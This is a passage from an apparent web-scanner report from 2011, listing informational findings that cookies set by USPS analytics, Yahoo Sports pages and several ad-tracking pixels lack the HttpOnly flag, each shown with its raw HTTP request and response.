Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT; u=4e6616acaf0c5; f8=258981:et:8:ETF:07:4:; i_8=10:37:191:18:0:50961:1315313324:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:49:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313355:B2|10:37:190:18:0:50961:1315313354:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:49:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 787

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc2
...[SNIP]...

10.96. http://sdc.usps.com/dcs731qdj000004f27giixw3q_2i4w/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.usps.com
Path:   /dcs731qdj000004f27giixw3q_2i4w/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs731qdj000004f27giixw3q_2i4w/dcs.gif?&dcsdat=1315331587325&dcssip=postcalc.usps.gov&dcsuri=/&WT.tz=-5&WT.bh=12&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Postage%20Price%20Calculator&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=750x400&WT.fv=10.3&WT.slv=Unknown&WT.tv=9.3.0&WT.dl=0&WT.ssl=0&WT.es=postcalc.usps.gov/&WT.vt_f_a=2&WT.vt_f=2 HTTP/1.1
Host: sdc.usps.com
Proxy-Connection: keep-alive
Referer: http://postcalc.usps.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_w6-ted_80=ffffffff3b22bffa45525d5f4f58455e445a4a421548; WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331579861:ss=1315331559860; ACOOKIE=C8ctADU2LjAuNzAuNi0zNjkwOTA1OTIwLjMwMTc0MzU1AAAAAAAAAAAAAAABAAAAAwAAAKsXZk6XF2ZOAQAAAAEAAACrF2ZOlxdmTgEAAAADAAAAHTU2LjAuNzAuNi0zNjkwOTA1OTIwLjMwMTc0MzU1

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:ac9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADU2LjAuNzAuNi0zNjkwOTA1OTIwLjMwMTc0MzU1AAAAAAAAAAAAAAACAAAAAwAAAKsXZk6XF2ZOFAAAALMXZk6zF2ZOAQAAAAEAAACzF2ZOlxdmTgEAAAADAAAAHTU2LjAuNzAuNi0zNjkwOTA1OTIwLjMwMTc0MzU1; path=/; expires=Thu, 06-Oct-2011 12:53:07 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:53:06 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.97. http://sdc.usps.com/dcsq8lc5w10000sxojnpk5m85_1i5u/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.usps.com
Path:   /dcsq8lc5w10000sxojnpk5m85_1i5u/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsq8lc5w10000sxojnpk5m85_1i5u/dcs.gif?&dcsdat=1315331559857&dcssip=zip4.usps.com&dcsuri=/zip4/welcome.jsp&dcsref=http://www.fairpoint.com/&WT.co_f=56.0.70.6-3690905920.30174355&WT.vtid=56.0.70.6-3690905920.30174355&WT.vtvs=1315331559860&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=12&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=USPS%20-%20ZIP%20Code%20Lookup%20-%20Search%20By%20Address&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1266x909&WT.fv=10.3&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=zip4.usps.com/zip4/welcome.jsp&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: sdc.usps.com
Proxy-Connection: keep-alive
Referer: http://zip4.usps.com/zip4/welcome.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_w6-ted_80=ffffffff3b22bffa45525d5f4f58455e445a4a421548; WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331559860:ss=1315331559860

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:ac9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADU2LjAuNzAuNi0zNjkwOTA1OTIwLjMwMTc0MzU1AAAAAAAAAAAAAAABAAAAAwAAAJcXZk6XF2ZOAQAAAAEAAACXF2ZOlxdmTgAAAAA-; path=/; expires=Thu, 06-Oct-2011 12:52:39 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:52:39 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.98. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-2-0-0-0-1315313090-0; path=/; domain=.suitesmart.com; expires=Sun, 04-Mar-2012 12:44:50 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:44:50 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

10.99. http://sports.yahoo.com/mlb/recap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /mlb/recap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false; adxid=016e3b4e6615bdb5; YWP_VOLUME=0.5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; spt_site=scorethin_league=nascar

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:19 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 247599

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Lee tosses another gem, shuts out Braves - MLB - Yahoo! Sports</title>
<meta http-e
...[SNIP]...

10.100. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 6
Proxy-Connection: keep-alive
Via: HTTP/1.1 r1.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 291643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tiki Barber remains unemployed and sad - Shutdown Corner - NFL&nbsp;Blog - Yahoo! Spor
...[SNIP]...

10.101. http://testdm.travelers.com/trvwics.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://testdm.travelers.com
Path:   /trvwics.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993 HTTP/1.1
Host: testdm.travelers.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw,
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ad_guid_imp=ef62eaf6-2da3-4346-8fe2-c70fb482c03a~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/05/2011 03:44.28.962 PM EDT; redUmbrella=BD27701E6D77E3FB7CEC6F2728F9B165C580796943B8785C1738755EA976ADED3F9E774C

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Content-Type: image/gif
Expires: Thu, 01 Dec 1994 16:00:00 GMT
P3P: CP="NON ADM DEV TAI PSA PSD IVA OUR IND UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: ad_guid_imp=7ffd757b-6447-4d98-ae3d-054ef9348332~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/06/2011 08:45.29.491 AM EDT; Domain=.travelers.com; Expires=Wed, 5-Sep-12 12:45:29 GMT; Path=/
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

10.102. http://thesearchagency.net/pixspike.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thesearchagency.net
Path:   /pixspike.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixspike.php?tsatime=1315327921958&uref=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone+service&ckwid=go000000516757112s_business_telephone_service&pageQs=utm_source%3Dgoogle%26utm_medium%3Dppc%26utm_term%3Dbusiness_telephone_service%26utm_campaign%3Dphones_business%26refcd%3DGO000000516757112s_business_telephone_service%26tsacr%3DGO7010955737%26_kk%3De5cfc5b1-4c17-4425-8b78-9c87aae9c019%26_kt%3D7010955737%26gclid%3DCMqnsqPHiKsCFRM2gwodbCP53A&siteid=784&wayid=6025&tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958&tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958 HTTP/1.1
Host: thesearchagency.net
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tsav438=uvid8f5717129fa0c9b859c3a2e4b98f21d828519

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:02 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16 proxy_html/2.5 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: tsas784=usid54f3722f72cf13ba4e964afc25de508921958; path=/; domain=.thesearchagency.net
Set-Cookie: tsav784=uvid54f3722f72cf13ba4e964afc25de508921958; expires=Mon, 02-Jun-2014 11:52:02 GMT; path=/; domain=.thesearchagency.net
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR UNRa IND UNI COM NAV INT STA PRE"
Expires: Thu, 19 Aug 1993 21:00:00 GMT
Cache-Control: no-store
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: image/gif

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.103. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.104. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.105. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.106. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.107. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.108. http://tr.adinterax.com/re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
